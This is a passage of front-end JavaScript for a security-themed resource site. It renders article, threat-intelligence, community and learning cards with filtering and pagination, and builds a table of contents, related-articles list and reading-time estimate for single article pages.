            <a href="${item.link}" target="_blank" rel="noopener noreferrer" class="block bg-white dark:bg-slate-800 p-6 rounded-xl border border-gray-200 dark:border-slate-700 hover:border-brand-500 dark:hover:border-brand-400 hover:shadow-lg dark:hover:shadow-brand-500/10 hover:-translate-y-1 transition-all group relative overflow-hidden">
                <div class="absolute top-0 left-0 w-1 h-full bg-brand-500 opacity-0 group-hover:opacity-100 transition-opacity"></div>
                <div class="flex justify-between items-start mb-4">
                    <div class="flex items-center gap-3">
                        <span class="w-10 h-10 rounded-full bg-brand-50 dark:bg-brand-900/30 flex items-center justify-center text-brand-600 dark:text-brand-400 group-hover:scale-110 transition-transform">
                            <i class="fa-solid fa-external-link-alt text-sm"></i>
                        </span>
                        <div>
                            <h4 class="font-bold text-gray-900 dark:text-white group-hover:text-brand-600 dark:group-hover:text-brand-400 transition-colors flex items-center gap-2">
                                ${item.title} <i class="fa-solid fa-arrow-up-right-from-square text-[10px] text-gray-400 opacity-0 group-hover:opacity-100 transition-opacity"></i>
                            </h4>
                        </div>
                    </div>
                </div>
                <p class="text-sm text-gray-600 dark:text-gray-300 mb-4">${item.summary}</p>
                <div class="flex flex-wrap gap-2 pt-2 border-t border-gray-100 dark:border-slate-700/50">
                    ${item.tags.map(tag => `<span class="px-2 py-1 text-[10px] font-bold uppercase tracking-wider bg-gray-50 text-gray-600 dark:bg-slate-900 dark:text-gray-400 rounded">${tag}</span>`).join('')}
                </div>
            </a>
        `;

        const renderCommunity = (item) => `
            <a href="${item.link}" target="_blank" rel="noopener noreferrer" class="flex flex-col bg-white dark:bg-slate-800 p-6 rounded-xl border border-gray-200 dark:border-slate-700 hover:border-brand-500 dark:hover:border-brand-500/50 hover:shadow-md transition-all h-full group">
                <div class="flex justify-between items-start mb-4">
                    <span class="px-2 py-1 text-[10px] font-bold uppercase tracking-wider rounded border bg-brand-50 text-brand-700 dark:bg-brand-900/30 dark:text-brand-300 border-brand-200 dark:border-brand-800">${item.label}</span>
                    <span class="text-xs font-medium text-gray-500 dark:text-gray-400 flex items-center bg-gray-50 dark:bg-slate-900 px-2 py-1 rounded"><i class="fa-solid fa-users mr-1 text-brand-500"></i> ${item.type}</span>
                </div>
                <h4 class="text-lg font-bold text-gray-900 dark:text-white mb-2 group-hover:text-brand-500 transition-colors flex items-center gap-2">
                    ${item.title} <i class="fa-solid fa-arrow-up-right-from-square text-[10px] text-gray-400 opacity-0 group-hover:opacity-100 transition-opacity"></i>
                </h4>
                <p class="text-sm text-gray-600 dark:text-gray-400 mb-6 flex-1">${item.description}</p>
                <div class="flex flex-wrap gap-2 pt-4 border-t border-gray-100 dark:border-slate-700/50">
                    ${item.tags.map(tag => `<span class="px-2 py-1 text-[10px] font-bold bg-gray-50 text-gray-600 dark:bg-slate-900 dark:text-gray-400 rounded">${tag}</span>`).join('')}
                </div>
            </a>
        `;

        const renderLearning = (item) => {
            const levelColors = {
                'Beginner': 'bg-green-100 text-green-800 dark:bg-green-900/30 dark:text-green-400 border-green-200 dark:border-green-800',
                'Intermediate': 'bg-blue-100 text-blue-800 dark:bg-blue-900/30 dark:text-blue-400 border-blue-200 dark:border-blue-800',
                'Advanced': 'bg-purple-100 text-purple-800 dark:bg-purple-900/30 dark:text-purple-400 border-purple-200 dark:border-purple-800',
            };
            const levelClass = levelColors[item.type];

            return `
            <a href="${item.link}" class="flex flex-col bg-white dark:bg-slate-800 p-6 rounded-xl border border-gray-200 dark:border-slate-700 hover:border-brand-500 dark:hover:border-brand-500/50 hover:shadow-md transition-all h-full group">
                <div class="flex justify-between items-start mb-4">
                    <span class="px-2 py-1 text-[10px] font-bold uppercase tracking-wider rounded border ${levelClass}">${item.type}</span>
                    <span class="text-xs font-medium text-gray-500 dark:text-gray-400 flex items-center bg-gray-50 dark:bg-slate-900 px-2 py-1 rounded"><i class="fa-solid fa-tag mr-1 text-brand-500"></i> ${item.kind}</span>
                </div>
                <h4 class="text-lg font-bold text-gray-900 dark:text-white mb-2 group-hover:text-brand-500 transition-colors">${item.title}</h4>
                <p class="text-sm text-gray-600 dark:text-gray-400 mb-6 flex-1">${item.description}</p>
                <div class="flex flex-wrap gap-2 pt-4 border-t border-gray-100 dark:border-slate-700/50">
                    ${item.tags.map(tag => `<span class="px-2 py-1 text-[10px] font-bold bg-gray-50 text-gray-600 dark:bg-slate-900 dark:text-gray-400 rounded">${tag}</span>`).join('')}
                </div>
            </a>
            `;
        };

        // Initialize Managers & Filters
        function populateData(dataArray, selectElementId) {
            const select = document.getElementById(selectElementId);
            if (!select) return;
            const tags = new Set();
            if(selectElementId.includes('tag'))
            dataArray.forEach(item => {
                item.tags.forEach(t => tags.add(t));
            });
            else if(selectElementId.includes('type'))
            dataArray.forEach(item => {
                tags.add(item.type);
            });
            
            const fragment = document.createDocumentFragment();
            Array.from(tags).sort().forEach(tag => {
                const option = document.createElement('option');
                option.value = tag;
                option.textContent = tag;
                fragment.appendChild(option);
            });
            select.appendChild(fragment);
        }

        function updateOptions(dataArray, selectElementId,filterValue){
            const tagSelect = document.getElementById(selectElementId);
            Array.from(tagSelect.options).forEach(option => option.disabled = false);
            console.log(filterValue);
            if(filterValue==='all') return;

            let tags=new Set();
            tags.add('all');
            if(selectElementId.includes('tag')){
                dataArray.forEach(item => {
                    if(item.type===filterValue){
                        item.tags.forEach(t => tags.add(t));
                    }
                });
            }
            if(selectElementId.includes('type')){
                dataArray.forEach(item => {
                    if(item.tags.includes(filterValue)){
                        tags.add(item.type);
                    }
                });
            }
            Array.from(tagSelect.options).forEach(option => {
                option.disabled = !tags.has(option.value);
            });
        }

        populateData(articlesData, 'article-tag-select');
        populateData(ctiData, 'cti-tag-select');
        populateData(communityData, 'community-tag-select');
        populateData(communityData,'community-type-select');
        populateData(learningData, 'learning-tag-select');
        populateData(learningData, 'learning-type-select');


        const articlesManager = new ListManager({ data: articlesData, containerId: 'articles-grid', paginationId: 'articles-pagination', renderItem: renderArticle, itemsPerPage: 8 });
        const ctiManager = new ListManager({ data: ctiData, containerId: 'cti-grid', paginationId: 'cti-pagination', renderItem: renderCTI, itemsPerPage: 6, defaultSort: 'az' });
        const communityManager = new ListManager({ data: communityData, containerId: 'community-grid', paginationId: 'community-pagination', renderItem: renderCommunity, itemsPerPage: 6, defaultSort: 'az' });
        const learningManager = new ListManager({ data: learningData, containerId: 'learning-grid', paginationId: 'learning-pagination', renderItem: renderLearning, itemsPerPage: 6, defaultSort: 'az' });

        const homeProjectsGrid = document.getElementById('home-projects-grid');
        if (homeProjectsGrid) {
            homeProjectsGrid.innerHTML = articlesData.slice(0, 4).map((item, index) => {
                const temp = document.createElement('div');
                temp.innerHTML = renderArticle(item).trim();
                const node = temp.firstChild;
                if (node) {
                    node.classList.add('reveal', 'active');
                    node.style.animationDelay = `${index * 50}ms`;
                    return node.outerHTML;
                }
                return '';
            }).join('');
        }

        // Event Listeners for Filters
        document.querySelectorAll('#article-type-filters .filter-btn').forEach(btn => {
            btn.addEventListener('click', (e) => {
                document.querySelectorAll('#article-type-filters .filter-btn').forEach(b => {
                    b.classList.remove('bg-brand-500', 'text-white');
                    b.classList.add('bg-gray-100', 'dark:bg-slate-700', 'text-gray-700', 'dark:text-gray-300');
                });
                e.target.classList.remove('bg-gray-100', 'dark:bg-slate-700', 'text-gray-700', 'dark:text-gray-300');
                e.target.classList.add('bg-brand-500', 'text-white');
                articlesManager.setFilters(e.target.dataset.filter, undefined, undefined);
            });
        });
        
        ['article-tag-select', 'article-sort'].forEach(id => {
            const el = document.getElementById(id);
            if(el) el.addEventListener('change', (e) => articlesManager.setFilters(undefined, id.includes('tag') ? e.target.value : undefined, id.includes('sort') ? e.target.value : undefined));
        });

        ['cti-tag-select', 'cti-sort'].forEach(id => {
            const el = document.getElementById(id);
            if(el) el.addEventListener('change', (e) => ctiManager.setFilters(undefined, id.includes('tag') ? e.target.value : undefined, id.includes('sort') ? e.target.value : undefined));
        });

        ['community-tag-select','community-type-select', 'community-sort'].forEach(id => {
            const el = document.getElementById(id);
            if(el) el.addEventListener('change', (e) => {
                communityManager.setFilters(id.includes('type') ? e.target.value : undefined, id.includes('tag') ? e.target.value : undefined, id.includes('sort') ? e.target.value : undefined);
                if (id.includes('type')) updateOptions(communityData,'community-tag-select',e.target.value)
                if (id.includes('tag')) updateOptions(communityData,'community-type-select',e.target.value)
            });
        });

        ['learning-tag-select','learning-type-select', 'learning-sort'].forEach(id => {
            const el = document.getElementById(id);
            if(el) el.addEventListener('change', (e) => {
                learningManager.setFilters(id.includes('type') ? e.target.value : undefined, id.includes('tag') ? e.target.value : undefined, id.includes('sort') ? e.target.value : undefined);
                if (id.includes('type')) updateOptions(learningData,'learning-tag-select',e.target.value)
                if (id.includes('tag')) updateOptions(learningData,'learning-type-select',e.target.value)
        });
        });

    function initTOCAndUI() {
    const container = document.querySelector('#page-article-single .lg\\:col-span-8');
    const deskNav = document.getElementById('toc-nav');
    const headings = container?.querySelectorAll('h1, h2, h3, h4, h5, h6') || [];
    
    if (!deskNav || !headings.length){ 
        document.getElementById("toc-container").classList.add("hidden");
        document.getElementById("article-single-content").classList.add("lg:col-span-12");
        document.getElementById("articles-single-body").classList.add("remove-last-child");
        return; }

    // Build TOC Tree & Set IDs
    const rootItems = [], stack = [];
    headings.forEach((h, i) => {
        h.id = h.id || h.textContent.toLowerCase().replace(/[^a-z0-9]+/g, '-').replace(/(^-|-$)/g, '') || `toc-${i}`;
        h.classList.add('scroll-mt-28');
        
        const item = { id: h.id, text: h.textContent, level: +h.tagName[1], children: [] };
        while (stack.length && stack[stack.length - 1].level >= item.level) stack.pop();
        (stack.length ? stack[stack.length - 1].children : rootItems).push(item);
        stack.push(item);
    });

    const buildHTML = (items, nested = false) => items.length ? 
        `<ul class="${nested ? 'pl-4 mt-1 space-y-1 border-l border-gray-200 dark:border-slate-700' : 'space-y-1'}">` +
        items.map((item, i) => {
            const isFirst = !nested && i === 0;
            const classes = isFirst 
                ? 'text-brand-600 dark:text-brand-400 bg-brand-50 dark:bg-slate-700/50 font-semibold active-toc' 
                : 'text-gray-600 dark:text-gray-400 hover:bg-gray-100 dark:hover:bg-slate-700/50';
            return `<li><a href="#${item.id}" class="toc-link block py-1.5 px-3 rounded transition-colors text-sm ${classes}">${item.text}</a>${buildHTML(item.children, true)}</li>`;
        }).join('') + '</ul>' : '';
    

    const html = buildHTML(rootItems);
    deskNav.innerHTML = html;

    // ScrollSpy (IntersectionObserver)
    const activeCls = ['text-brand-600', 'dark:text-brand-400', 'bg-brand-50', 'dark:bg-slate-700/50', 'font-semibold', 'active-toc'];
    const inactiveCls = ['text-gray-600', 'dark:text-gray-400'];
    
    const observer = new IntersectionObserver(entries => {
        const visible = entries.find(e => e.isIntersecting);
        if (visible) {
            document.querySelectorAll('.toc-link').forEach(link => {
                const isActive = link.getAttribute('href') === `#${visible.target.id}`;
                activeCls.forEach(c => link.classList.toggle(c, isActive));
                inactiveCls.forEach(c => link.classList.toggle(c, !isActive));
            });
        }
    }, { rootMargin: '-100px 0px -60% 0px' });
    
    headings.forEach(h => observer.observe(h));
}

    document.addEventListener('click', e => {
    const tocLink = e.target.closest('.toc-link');
    if (tocLink) {
        e.preventDefault();
        document.querySelector(tocLink.getAttribute('href'))?.scrollIntoView({ behavior: 'smooth', block: 'start' });
        // document.getElementById('toc-menu')?.classList.add('hidden');
        // document.getElementById('toc-icon')?.classList.remove('rotate-180');
    }
    
    if (e.target.closest('#toc-toggle')) {
        document.getElementById('toc-menu')?.classList.toggle('hidden');
        document.getElementById('toc-icon')?.classList.toggle('rotate-180');
    }
});

// Initialize safely
if(document.getElementById("page-article-single")){
if (document.readyState === 'loading') document.addEventListener('DOMContentLoaded', initTOCAndUI);
else initTOCAndUI();
}

// Back to Top Scroll Logic
document.addEventListener('click',e=>{
    if (e.target.closest('#back-to-top')) {
        window.scrollTo({ top: 0, behavior: 'smooth' });
    }
    });

window.addEventListener('scroll', () => {
    const btn = document.getElementById('back-to-top');
    if (btn) {
        const show = window.scrollY > window.innerHeight;
        ['opacity-0', 'translate-y-4', 'invisible'].forEach(c => btn.classList.toggle(c, !show));
        ['opacity-100', 'translate-y-0', 'visible'].forEach(c => btn.classList.toggle(c, show));
    }
});


// Article Single Page

//render data into single article page
const articleElement = document.querySelector("[data-article-id]");
const relatedArticlesGrid = document.getElementById('related-articles-grid');

if (articleElement) {
    const id = articleElement.dataset.articleId;

    const article = articlesData.find(item => item.id == id);
    if (article) {
        document.title = article.title;

        document.querySelector("#article-single-title").textContent =
            article.title;

        document.querySelector("#article-single-type").textContent =
            article.type;

        document.querySelector("#article-single-date").textContent =
            article.date;
                
        document.querySelector("#article-single-read").textContent = getReadingTimeData(article.content);

        document.querySelector("#article-single-tags").innerHTML = article.tags.map(tag => 
            `<span class="px-2.5 py-1 text-xs font-semibold text-brand-700 bg-brand-50 border border-brand-100 dark:text-brand-300 dark:bg-brand-900/30 dark:border-brand-800 rounded-md">${tag}</span>`
        ).join('');

        document.querySelector("#article-single-content").innerHTML =
            article.content;
    }

    //Related Articles
        if (relatedArticlesGrid) {
        // prioritizeArticles
            const relatedArticles = articlesData.filter(article => article.id != articleElement.dataset.articleId).sort((a, b) => {
                const getScore = (article) => {
                let score = 0;
                const hasMatchingTag = article.tags.some(tag => article.tags.includes(tag));
                if (hasMatchingTag) score += 100;
                if (article.type === article.type) score += 10;
                return score;
                };
                const scoreA = getScore(a);
                const scoreB = getScore(b);

                if (scoreB !== scoreA) {
                return scoreB - scoreA; 
                }
                return new Date(b.date) - new Date(a.date);
            });

            relatedArticlesGrid.innerHTML = relatedArticles.slice(0, 2).map((item,index) => {
                const temp = document.createElement('div');
                temp.innerHTML = renderArticle(item).trim();
                const node = temp.firstChild;
                if (node) {
                    node.classList.add('reveal', 'active');
                    return node.outerHTML;
                }
                return '';
            }).join('');
    }
}

//generate article URL based on title
function generateArticleUrl(title) {
  const slug = title
    .toLowerCase()
    .trim()
    .replace(/[^a-z0-9\s-]/g, '')
    .replace(/\s+/g, '-');        

  return `/articles/${slug}/`;
}

function getReadingTimeData(text, wordsPerMinute = 150) {
  const plainText = text.replace(/<[^>]+>/g, '');
  const wordCount = plainText.trim().split(/\s+/).filter(word => word.length > 0).length;
  const minutes = Math.ceil(wordCount / wordsPerMinute);

  return minutes + " min read";
}
